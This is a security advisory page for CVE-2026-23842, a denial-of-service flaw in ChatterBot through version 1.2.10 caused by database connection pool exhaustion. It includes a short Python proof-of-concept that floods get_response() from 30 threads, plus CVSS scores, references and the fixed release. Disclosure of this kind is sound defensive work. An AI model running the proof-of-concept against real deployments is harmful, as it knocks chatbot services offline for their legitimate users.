Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2026-23842

ChatterBot Vulnerable to Denial of Service via Database Connection Pool Exhaustion
Back to all
CVE

CVE-2026-23842

ChatterBot Vulnerable to Denial of Service via Database Connection Pool Exhaustion

Summary

ChatterBot versions up to 1.2.10 are vulnerable to a denial-of-service condition caused by improper database session and connection pool management. Concurrent invocations of the get_response() method can exhaust the underlying SQLAlchemy connection pool, resulting in persistent service unavailability and requiring a manual restart to recover.

Details

ChatterBot relies on SQLAlchemy for database access and uses a connection pool with default limits. The get_response() method does not enforce concurrency limits, rate limiting, or explicit session lifecycle controls.

When multiple threads concurrently invoke get_response(), database connections are rapidly consumed and not released in a timely manner. This leads to exhaustion of the SQLAlchemy QueuePool, causing subsequent requests to block and eventually fail with a TimeoutError.

This issue can be triggered without authentication in deployments where ChatterBot is exposed as a chatbot service, making it exploitable by remote attackers to cause denial of service.

PoC Video: 

https://github.com/user-attachments/assets/4ee845c4-b847-4854-84ec-4b2fb2f7090f

PoC

  1. Install ChatterBot version 1.2.10.
  2. Use the default database configuration (SQLite / SQLAlchemy).
  3. Run the following Python script to invoke concurrent requests:

from chatterbot import ChatBot

import threading

bot = ChatBot("dos-test")

def attack():

    bot.get_response("hello")

threads = []

for _ in range(30):

    t = threading.Thread(target=attack)

    t.start()

    threads.append(t)

for t in threads:

    t.join()

  1. Observe that the application becomes unresponsive and raises SQLAlchemy TimeoutError exceptions indicating exhaustion of the connection pool.

Impact

This vulnerability allows an attacker to trigger a denial-of-service condition by exhausting the database connection pool. Once triggered, the chatbot becomes unresponsive to legitimate users and requires a manual restart to restore functionality.

All deployments of ChatterBot version 1.2.10 or earlier that allow concurrent access to the get_response() method are impacted.

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
7.5
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
C
H
U
7.5
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Related Resources

No items found.

References

https://github.com/gunthercox/ChatterBot/security/advisories/GHSA-v4w8-49pv-mf72, https://nvd.nist.gov/vuln/detail/CVE-2026-23842, https://github.com/gunthercox/ChatterBot/pull/2432, https://github.com/gunthercox/ChatterBot/commit/de89fe648139f8eeacc998ad4524fab291a378cf, https://github.com/gunthercox/ChatterBot, https://github.com/gunthercox/ChatterBot/releases/tag/1.2.11, https://github.com/user-attachments/assets/4ee845c4-b847-4854-84ec-4b2fb2f7090f

Severity

7.5

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
7.5
EPSS Probability
0.00034%
EPSS Percentile
0.09895%
Introduced Version
0,1.2.8,1.2.7,1.0.0a3,0.6.3,0.6.1
Fix Available
1.2.11

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading